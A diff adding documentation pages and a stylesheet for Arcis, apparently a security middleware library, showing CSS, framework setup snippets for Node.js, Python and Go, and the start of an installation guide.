+<pre><code><span class="k">import</span> <span class="p">{</span> csrfProtection <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+app.<span class="f">use</span><span class="p">(</span><span class="f">csrfProtection</span><span class="p">({</span>
+  cookieName<span class="p">:</span> <span class="s">'__Host-csrf'</span><span class="p">,</span>   <span class="c">// __Host- prefix requires Secure + Path=/</span>
+  useHostPrefix<span class="p">:</span> <span class="k">true</span><span class="p">,</span>
+  skipCsrf<span class="p">:</span> <span class="p">(</span>req<span class="p">)</span> <span class="k">=></span> req.path.<span class="f">startsWith</span><span class="p">(</span><span class="s">'/api/webhook/'</span><span class="p">),</span>
+<span class="p">}));</span></code></pre>
+
+      <h2 id="dev-mode">Development mode</h2>
+      <p>In dev, show detailed error info. In production (default), scrub all sensitive info from errors.</p>
+<pre><code>app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">({</span>
+  isDev<span class="p">:</span> process.env.NODE_ENV === <span class="s">'development'</span><span class="p">,</span>
+<span class="p">}));</span></code></pre>
+
+      <div class="docs-pagination">
+        <a href="./frameworks.html" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">Framework Adapters</span>
+        </a>
+        <a href="./attack-vectors.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">Attack Vectors</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/docs.css
+++ b/website/documentation/docs.css
@@ -1,0 +1,490 @@
+/* ─── Arcis Docs Styles ─────────────────────────────── */
+
+*, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; }
+
+:root {
+  --bg: #e4e5e0;
+  --bg-warm: #dadbd5;
+  --bg-card: #f2f3f0;
+  --bg-dark: #141413;
+  --bg-code: #1e1e2e;
+  --text: #141413;
+  --text-secondary: #474a45;
+  --text-muted: #747a72;
+  --accent: #00996D;
+  --accent-hover: #007a57;
+  --accent-light: #68D970;
+  --accent-glow: rgba(0, 153, 109, 0.15);
+  --red: #F40C3F;
+  --gold: #eda100;
+  --border: #c8cac4;
+  --border-soft: rgba(200, 202, 196, 0.5);
+  --serif: 'EB Garamond', Georgia, 'Times New Roman', serif;
+  --sans: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
+  --mono: 'JetBrains Mono', 'Fira Code', 'Cascadia Code', monospace;
+  --sidebar-w: 280px;
+  --nav-h: 4.25rem;
+}
+
+html { scroll-behavior: smooth; font-size: 16px; }
+
+body {
+  font-family: var(--sans);
+  background: var(--bg);
+  color: var(--text);
+  line-height: 1.6;
+  -webkit-font-smoothing: antialiased;
+}
+
+::selection { background: var(--accent-glow); color: var(--accent-hover); }
+a { color: var(--accent); text-decoration: none; transition: color 0.2s; }
+a:hover { color: var(--accent-hover); }
+
+/* ─── Top Navigation (matches main site) ────────────── */
+.docs-nav {
+  position: fixed;
+  top: 0; left: 0; right: 0;
+  height: var(--nav-h);
+  background: rgba(228, 229, 224, 0.85);
+  backdrop-filter: blur(16px);
+  -webkit-backdrop-filter: blur(16px);
+  border-bottom: 1px solid var(--border);
+  z-index: 1000;
+  transition: box-shadow 0.3s ease;
+}
+.docs-nav.scrolled { box-shadow: 0 1px 20px rgba(0,0,0,0.06); }
+
+.docs-nav-inner {
+  max-width: 1200px;
+  margin: 0 auto;
+  padding: 0 2rem;
+  height: 100%;
+  display: flex;
+  align-items: center;
+  justify-content: space-between;
+}
+.docs-logo {
+  font-family: var(--serif);
+  font-size: 1.5rem;
+  font-weight: 700;
+  letter-spacing: -0.02em;
+  color: var(--text);
+}
+.docs-logo span { color: var(--accent-light); }
+
+.docs-nav-links {
+  display: flex;
+  align-items: center;
+  gap: 2rem;
+  list-style: none;
+}
+.docs-nav-links a {
+  font-size: 0.9rem;
+  font-weight: 500;
+  color: var(--text-secondary);
+  transition: color 0.2s;
+}
+.docs-nav-links a:hover { color: var(--text); }
+.docs-nav-links a.active { color: var(--accent); }
+
+.docs-nav-cta { display: flex; align-items: center; gap: 0.75rem; }
+
+.btn-star {
+  display: inline-flex;
+  align-items: center;
+  gap: 0.5rem;
+  padding: 0.5rem 1rem;
+  border: 1.5px solid var(--border);
+  border-radius: 8px;
+  font-size: 0.85rem;
+  font-weight: 500;
+  color: var(--text-secondary);
+  background: var(--bg-card);
+  transition: all 0.2s;
+  cursor: pointer;
+}
+.btn-star:hover { border-color: var(--text-muted); color: var(--text); box-shadow: 0 2px 8px rgba(0,0,0,0.06); }
+.btn-star svg { width: 16px; height: 16px; }
+.btn-star .star-count {
+  font-family: var(--mono);
+  font-size: 0.8rem;
+  color: var(--accent-light);
+  font-weight: 600;
+}
+
+.btn-primary-nav {
+  display: inline-flex;
+  align-items: center;
+  gap: 0.5rem;
+  padding: 0.55rem 1.25rem;
+  background: var(--accent);
+  color: #fff;
+  border: none;
+  border-radius: 8px;
+  font-size: 0.85rem;
+  font-weight: 600;
+  cursor: pointer;
+  transition: all 0.2s;
+  text-decoration: none;
+}
+.btn-primary-nav:hover { background: var(--accent-hover); color: #fff; transform: translateY(-1px); box-shadow: 0 4px 16px rgba(0, 153, 109, 0.25); }
+
+/* ─── Layout ──────────────────────────────────────── */
+.docs-layout {
+  max-width: 1200px;
+  margin: 0 auto;
+  display: grid;
+  grid-template-columns: var(--sidebar-w) 1fr;
+  gap: 3rem;
+  padding: calc(var(--nav-h) + 2rem) 2rem 2rem;
+}
+
+/* ─── Sidebar ─────────────────────────────────────── */
+.docs-sidebar {
+  position: sticky;
+  top: calc(var(--nav-h) + 2rem);
+  height: calc(100vh - var(--nav-h) - 4rem);
+  overflow-y: auto;
+  padding-right: 1rem;
+}
+.docs-sidebar h3 {
+  font-family: var(--mono);
+  font-size: 0.75rem;
+  font-weight: 600;
+  text-transform: uppercase;
+  letter-spacing: 0.12em;
+  color: var(--text-muted);
+  margin-bottom: 0.75rem;
+  margin-top: 1.75rem;
+}
+.docs-sidebar h3:first-child { margin-top: 0; }
+.docs-sidebar ul {
+  list-style: none;
+  display: flex;
+  flex-direction: column;
+  gap: 0.15rem;
+}
+.docs-sidebar a {
+  display: block;
+  padding: 0.4rem 0.75rem;
+  border-radius: 6px;
+  font-size: 0.9rem;
+  color: var(--text-secondary);
+  transition: all 0.15s;
+}
+.docs-sidebar a:hover {
+  background: var(--bg-card);
+  color: var(--text);
+}
+.docs-sidebar a.active {
+  background: var(--accent-glow);
+  color: var(--accent-hover);
+  font-weight: 500;
+}
+
+/* ─── Main Content ────────────────────────────────── */
+.docs-content {
+  max-width: 780px;
+  min-width: 0;
+  padding-bottom: 4rem;
+}
+.docs-breadcrumb {
+  font-family: var(--mono);
+  font-size: 0.8rem;
+  color: var(--text-muted);
+  margin-bottom: 1rem;
+}
+.docs-breadcrumb a { color: var(--text-muted); }
+.docs-breadcrumb a:hover { color: var(--accent); }
+.docs-content h1 {
+  font-family: var(--serif);
+  font-size: clamp(2.25rem, 4vw, 3.25rem);
+  font-weight: 600;
+  line-height: 1.15;
+  letter-spacing: -0.02em;
+  margin-bottom: 1rem;
+}
+.docs-content h2 {
+  font-family: var(--serif);
+  font-size: 1.75rem;
+  font-weight: 600;
+  line-height: 1.25;
+  margin-top: 3.5rem;
+  margin-bottom: 1rem;
+  scroll-margin-top: calc(var(--nav-h) + 1rem);
+}
+.docs-content h3 {
+  font-family: var(--serif);
+  font-size: 1.3rem;
+  font-weight: 600;
+  line-height: 1.3;
+  margin-top: 2rem;
+  margin-bottom: 0.75rem;
+  scroll-margin-top: calc(var(--nav-h) + 1rem);
+}
+.docs-content p {
+  color: var(--text-secondary);
+  font-size: 1rem;
+  margin-bottom: 1.25rem;
+  line-height: 1.7;
+}
+.docs-content p.lead {
+  font-size: 1.15rem;
+  color: var(--text-secondary);
+  margin-bottom: 2.5rem;
+}
+.docs-content ul, .docs-content ol {
+  margin-bottom: 1.25rem;
+  padding-left: 1.5rem;
+  color: var(--text-secondary);
+}
+.docs-content li {
+  margin-bottom: 0.4rem;
+  line-height: 1.7;
+}
+.docs-content strong { color: var(--text); font-weight: 600; }
+.docs-content hr {
+  border: none;
+  border-top: 1px solid var(--border);
+  margin: 3rem 0;
+}
+
+/* ─── Inline Code ─────────────────────────────────── */
+.docs-content code {
+  font-family: var(--mono);
+  font-size: 0.85em;
+  background: rgba(0,0,0,0.05);
+  padding: 0.15em 0.4em;
+  border-radius: 4px;
+  color: var(--text);
+}
+
+/* ─── Code Blocks ─────────────────────────────────── */
+.docs-content pre {
+  background: var(--bg-code);
+  color: #cdd6f4;
+  padding: 1.25rem 1.5rem;
+  border-radius: 10px;
+  overflow-x: auto;
+  margin: 1.5rem 0;
+  font-family: var(--mono);
+  font-size: 0.9rem;
+  line-height: 1.55;
+  border: 1px solid rgba(0,0,0,0.1);
+}
+.docs-content pre code {
+  background: none;
+  padding: 0;
+  font-size: inherit;
+  color: inherit;
+}
+
+/* Syntax highlighting hints */
+.docs-content pre .k { color: #cba6f7; }   /* keyword */
+.docs-content pre .s { color: #a6e3a1; }   /* string */
+.docs-content pre .c { color: #7f849c; font-style: italic; } /* comment */
+.docs-content pre .f { color: #89dceb; }   /* function */
+.docs-content pre .p { color: #cdd6f4; }   /* punctuation */
+.docs-content pre .n { color: #f9e2af; }   /* number */
+
+/* ─── Callouts ────────────────────────────────────── */
+.callout {
+  padding: 1rem 1.25rem;
+  border-radius: 8px;
+  margin: 1.5rem 0;
+  border-left: 3px solid var(--accent);
+  background: var(--accent-glow);
+}
+.callout.note {
+  border-left-color: var(--accent);
+  background: rgba(0, 153, 109, 0.08);
+}
+.callout.warning {
+  border-left-color: var(--gold);
+  background: rgba(237, 161, 0, 0.08);
+}
+.callout.danger {
+  border-left-color: var(--red);
+  background: rgba(244, 12, 63, 0.06);
+}
+.callout p { margin: 0; color: var(--text); font-size: 0.95rem; }
+.callout p + p { margin-top: 0.5rem; }
+.callout strong { color: var(--text); }
+
+/* ─── Tables ──────────────────────────────────────── */
+.docs-content table {
+  width: 100%;
+  border-collapse: collapse;
+  margin: 1.5rem 0;
+  font-size: 0.9rem;
+  background: var(--bg-card);
+  border-radius: 8px;
+  overflow: hidden;
+  border: 1px solid var(--border);
+}
+.docs-content th {
+  background: var(--bg-warm);
+  padding: 0.75rem 1rem;
+  text-align: left;
+  font-weight: 600;
+  border-bottom: 1px solid var(--border);
+  font-size: 0.85rem;
+}
+.docs-content td {
+  padding: 0.75rem 1rem;
+  border-bottom: 1px solid var(--border-soft);
+  color: var(--text-secondary);
+}
+.docs-content tr:last-child td { border-bottom: none; }
+.docs-content td code { font-size: 0.8rem; }
+
+/* ─── Cards ───────────────────────────────────────── */
+.doc-cards {
+  display: grid;
+  grid-template-columns: repeat(auto-fit, minmax(240px, 1fr));
+  gap: 1rem;
+  margin: 2rem 0;
+}
+.doc-card {
+  padding: 1.5rem;
+  background: var(--bg-card);
+  border: 1px solid var(--border);
+  border-radius: 10px;
+  transition: all 0.2s;
+  display: block;
+}
+.doc-card:hover {
+  border-color: var(--accent);
+  transform: translateY(-2px);
+  box-shadow: 0 4px 16px rgba(0, 153, 109, 0.1);
+}
+.doc-card h3 {
+  font-family: var(--serif);
+  font-size: 1.2rem;
+  font-weight: 600;
+  margin: 0 0 0.5rem 0;
+  color: var(--text);
+}
+.doc-card p {
+  font-size: 0.9rem;
+  color: var(--text-secondary);
+  margin: 0;
+  line-height: 1.5;
+}
+
+/* ─── Tabs ────────────────────────────────────────── */
+.tabs {
+  margin: 1.5rem 0;
+}
+.tab-buttons {
+  display: flex;
+  gap: 0.25rem;
+  border-bottom: 1px solid var(--border);
+  margin-bottom: 1rem;
+}
+.tab-btn {
+  padding: 0.6rem 1rem;
+  background: none;
+  border: none;
+  font-family: var(--mono);
+  font-size: 0.85rem;
+  color: var(--text-muted);
+  cursor: pointer;
+  border-bottom: 2px solid transparent;
+  margin-bottom: -1px;
+  transition: all 0.2s;
+}
+.tab-btn:hover { color: var(--text); }
+.tab-btn.active {
+  color: var(--accent);
+  border-bottom-color: var(--accent);
+}
+.tab-panel { display: none; }
+.tab-panel.active { display: block; }
+
+/* ─── Pagination ──────────────────────────────────── */
+.docs-pagination {
+  display: flex;
+  justify-content: space-between;
+  gap: 1rem;
+  margin-top: 4rem;
+  padding-top: 2rem;
+  border-top: 1px solid var(--border);
+}
+.docs-pagination a {
+  flex: 1;
+  padding: 1rem 1.25rem;
+  border: 1px solid var(--border);
+  border-radius: 8px;
+  background: var(--bg-card);
+  transition: all 0.2s;
+  color: var(--text);
+}
+.docs-pagination a:hover {
+  border-color: var(--accent);
+  transform: translateY(-2px);
+}
+.docs-pagination a.prev { text-align: left; }
+.docs-pagination a.next { text-align: right; }
+.docs-pagination .nav-label {
+  display: block;
+  font-size: 0.75rem;
+  font-family: var(--mono);
+  text-transform: uppercase;
+  color: var(--text-muted);
+  letter-spacing: 0.08em;
+  margin-bottom: 0.25rem;
+}
+.docs-pagination .nav-title {
+  font-weight: 600;
+  color: var(--text);
+}
+
+/* ─── Footer ──────────────────────────────────────── */
+.docs-footer {
+  max-width: 1400px;
+  margin: 0 auto;
+  padding: 2rem 1.5rem;
+  border-top: 1px solid var(--border);
+  display: flex;
+  justify-content: space-between;
+  align-items: center;
+  font-size: 0.85rem;
+  color: var(--text-muted);
+}
+.docs-footer a { color: var(--text-muted); }
+.docs-footer a:hover { color: var(--accent); }
+
+/* ─── Mobile ──────────────────────────────────────── */
+.sidebar-toggle {
+  display: none;
+  background: var(--bg-card);
+  border: 1px solid var(--border);
+  padding: 0.5rem 0.75rem;
+  border-radius: 6px;
+  font-size: 0.85rem;
+  cursor: pointer;
+  color: var(--text);
+}
+
+@media (max-width: 900px) {
+  .docs-layout {
+    grid-template-columns: 1fr;
+    gap: 1rem;
+    padding: 1.5rem 1rem;
+  }
+  .docs-sidebar {
+    position: static;
+    height: auto;
+    max-height: none;
+    padding: 1rem;
+    background: var(--bg-card);
+    border: 1px solid var(--border);
+    border-radius: 10px;
+    display: none;
+  }
+  .docs-sidebar.mobile-open { display: block; }
+  .sidebar-toggle { display: inline-flex; align-items: center; gap: 0.5rem; margin-bottom: 1rem; }
+  .docs-nav-links { display: none; }
+  .docs-pagination { flex-direction: column; }
+}

--- a/website/documentation/frameworks.html
+++ b/website/documentation/frameworks.html
@@ -1,0 +1,205 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+  <title>Framework Adapters · Arcis Docs</title>
+  <meta name="description" content="Use Arcis with Express, FastAPI, Flask, Django, Gin, Echo, and net/http.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html" class="active">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / Framework Adapters</div>
+      <h1>Framework Adapters</h1>
+      <p class="lead">
+        Arcis has built-in adapters for the most popular web frameworks. The core functions are framework-agnostic, so Arcis also works with any framework that isn't listed here.
+      </p>
+
+      <h2 id="express">Express (Node.js)</h2>
+      <p>The primary Node.js adapter. Works with Express 4 and 5.</p>
+<pre><code><span class="k">import</span> express <span class="k">from</span> <span class="s">'express'</span><span class="p">;</span>
+<span class="k">import</span> <span class="p">{</span> arcis <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+<span class="k">const</span> app = <span class="f">express</span><span class="p">();</span>
+app.<span class="f">use</span><span class="p">(</span>express.<span class="f">json</span><span class="p">());</span>
+app.<span class="f">use</span><span class="p">(</span><span class="f">arcis</span><span class="p">());</span></code></pre>
+
+      <h2 id="fastify-koa-hono">Fastify / Koa / Hono (Node.js)</h2>
+      <p>Built-in adapters are on the roadmap. Today, use the core sanitize functions directly:</p>
+<pre><code><span class="c">// Fastify</span>
+<span class="k">import</span> <span class="p">{</span> sanitizeObject <span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span>
+
+fastify.<span class="f">addHook</span><span class="p">(</span><span class="s">'preHandler'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span>req<span class="p">,</span> reply<span class="p">)</span> <span class="k">=></span> <span class="p">{</span>
+  <span class="k">if</span> <span class="p">(</span>req.body<span class="p">)</span> req.body = <span class="f">sanitizeObject</span><span class="p">(</span>req.body<span class="p">);</span>
+  <span class="k">if</span> <span class="p">(</span>req.query<span class="p">)</span> req.query = <span class="f">sanitizeObject</span><span class="p">(</span>req.query<span class="p">);</span>
+<span class="p">});</span></code></pre>
+
+      <h2 id="fastapi">FastAPI (Python)</h2>
+<pre><code><span class="k">from</span> fastapi <span class="k">import</span> FastAPI
+<span class="k">from</span> arcis <span class="k">import</span> ArcisMiddleware
+
+app = <span class="f">FastAPI</span><span class="p">()</span>
+app.<span class="f">add_middleware</span><span class="p">(</span>ArcisMiddleware<span class="p">)</span></code></pre>
+      <p>For custom config:</p>
+<pre><code><span class="k">from</span> arcis <span class="k">import</span> ArcisMiddleware<span class="p">,</span> Config
+
+app.<span class="f">add_middleware</span><span class="p">(</span>
+    ArcisMiddleware<span class="p">,</span>
+    config=<span class="f">Config</span><span class="p">(</span>
+        sanitize_xss=<span class="k">True</span><span class="p">,</span>
+        rate_limit_max=<span class="n">60</span><span class="p">,</span>
+    <span class="p">),</span>
+<span class="p">)</span></code></pre>
+
+      <h2 id="flask">Flask (Python)</h2>
+<pre><code><span class="k">from</span> flask <span class="k">import</span> Flask
+<span class="k">from</span> arcis <span class="k">import</span> Arcis
+
+app = <span class="f">Flask</span><span class="p">(</span>__name__<span class="p">)</span>
+<span class="f">Arcis</span><span class="p">(</span>app<span class="p">)</span></code></pre>
+
+      <h2 id="django">Django (Python)</h2>
+      <p>Add to <code>MIDDLEWARE</code> in <code>settings.py</code>:</p>
+<pre><code>MIDDLEWARE = <span class="p">[</span>
+    <span class="s">'django.middleware.security.SecurityMiddleware'</span><span class="p">,</span>
+    <span class="s">'arcis.django.ArcisMiddleware'</span><span class="p">,</span>   <span class="c"># add this line</span>
+    <span class="s">'django.middleware.common.CommonMiddleware'</span><span class="p">,</span>
+    <span class="c"># ... rest of your middleware</span>
+<span class="p">]</span></code></pre>
+
+      <h2 id="gin">Gin (Go)</h2>
+<pre><code><span class="k">package</span> main
+
+<span class="k">import</span> <span class="p">(</span>
+    <span class="s">"github.com/gin-gonic/gin"</span>
+    arcisgin <span class="s">"github.com/GagancM/arcis/gin"</span>
+<span class="p">)</span>
+
+<span class="k">func</span> <span class="f">main</span><span class="p">()</span> <span class="p">{</span>
+    r := gin.<span class="f">Default</span><span class="p">()</span>
+    r.<span class="f">Use</span><span class="p">(</span>arcisgin.<span class="f">Middleware</span><span class="p">())</span>
+    r.<span class="f">Run</span><span class="p">()</span>
+<span class="p">}</span></code></pre>
+
+      <h2 id="echo">Echo (Go)</h2>
+<pre><code><span class="k">package</span> main
+
+<span class="k">import</span> <span class="p">(</span>
+    <span class="s">"github.com/labstack/echo/v4"</span>
+    arcisecho <span class="s">"github.com/GagancM/arcis/echo"</span>
+<span class="p">)</span>
+
+<span class="k">func</span> <span class="f">main</span><span class="p">()</span> <span class="p">{</span>
+    e := echo.<span class="f">New</span><span class="p">()</span>
+    e.<span class="f">Use</span><span class="p">(</span>arcisecho.<span class="f">Middleware</span><span class="p">())</span>
+    e.<span class="f">Start</span><span class="p">(</span><span class="s">":8080"</span><span class="p">)</span>
+<span class="p">}</span></code></pre>
+
+      <h2 id="net-http">net/http (Go)</h2>
+      <p>Use the core Arcis middleware with the standard library:</p>
+<pre><code><span class="k">package</span> main
+
+<span class="k">import</span> <span class="p">(</span>
+    <span class="s">"net/http"</span>
+    <span class="s">"github.com/GagancM/arcis"</span>
+<span class="p">)</span>
+
+<span class="k">func</span> <span class="f">main</span><span class="p">()</span> <span class="p">{</span>
+    mux := http.<span class="f">NewServeMux</span><span class="p">()</span>
+    mux.<span class="f">HandleFunc</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span>w http.ResponseWriter<span class="p">,</span> r *http.Request<span class="p">)</span> <span class="p">{</span>
+        w.<span class="f">Write</span><span class="p">([]</span><span class="k">byte</span><span class="p">(</span><span class="s">"ok"</span><span class="p">))</span>
+    <span class="p">})</span>
+
+    handler := arcis.<span class="f">Wrap</span><span class="p">(</span>mux<span class="p">)</span>
+    http.<span class="f">ListenAndServe</span><span class="p">(</span><span class="s">":8080"</span><span class="p">,</span> handler<span class="p">)</span>
+<span class="p">}</span></code></pre>
+
+      <div class="docs-pagination">
+        <a href="./getting-started.html" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">Getting Started</span>
+        </a>
+        <a href="./configuration.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">Configuration</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/getting-started.html
+++ b/website/documentation/getting-started.html
@@ -1,0 +1,276 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+
+  <!-- Google tag (gtag.js) -->
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+
+  <title>Getting Started · Arcis Docs</title>
+  <meta name="description" content="Install Arcis and protect your Node.js, Python, or Go app in under a minute.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html" class="active">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / Getting Started</div>
+      <h1>Getting Started</h1>
+      <p class="lead">
+        Install Arcis, add one line of code, and your application is protected against 20+ attack types. No configuration required.
+      </p>
+
+      <h2>Requirements</h2>
+      <ul>
+        <li><strong>Node.js</strong>: version 18 or later</li>
+        <li><strong>Python</strong>: version 3.9 or later</li>
+        <li><strong>Go</strong>: version 1.25 or later</li>
+      </ul>
+
+      <h2 id="install">Installation</h2>
+      <p>Install the package for your language. Arcis has zero runtime dependencies beyond the framework you're already using.</p>
+
+      <div class="tabs">
+        <div class="tab-buttons">
+          <button class="tab-btn active" data-tab="node">Node.js</button>
+          <button class="tab-btn" data-tab="python">Python</button>
+          <button class="tab-btn" data-tab="go">Go</button>
+        </div>
+
+        <div class="tab-panel active" data-panel="node">
+<pre><code>npm install @arcis/node</code></pre>
+          <p>Or with yarn:</p>
+<pre><code>yarn add @arcis/node</code></pre>
+        </div>
+
+        <div class="tab-panel" data-panel="python">
+<pre><code>pip install arcis</code></pre>
+          <p>For Redis store support:</p>
+<pre><code>pip install "arcis[redis]"</code></pre>
+        </div>
+
+        <div class="tab-panel" data-panel="go">
+<pre><code>go get github.com/GagancM/arcis</code></pre>
+        </div>
+      </div>
+
+      <h2 id="basic-setup">Basic setup</h2>
+      <p>Add Arcis to your app before defining any routes. The core middleware activates sanitization, rate limiting, and security headers with secure defaults.</p>
+
+      <h3>Node.js with Express</h3>
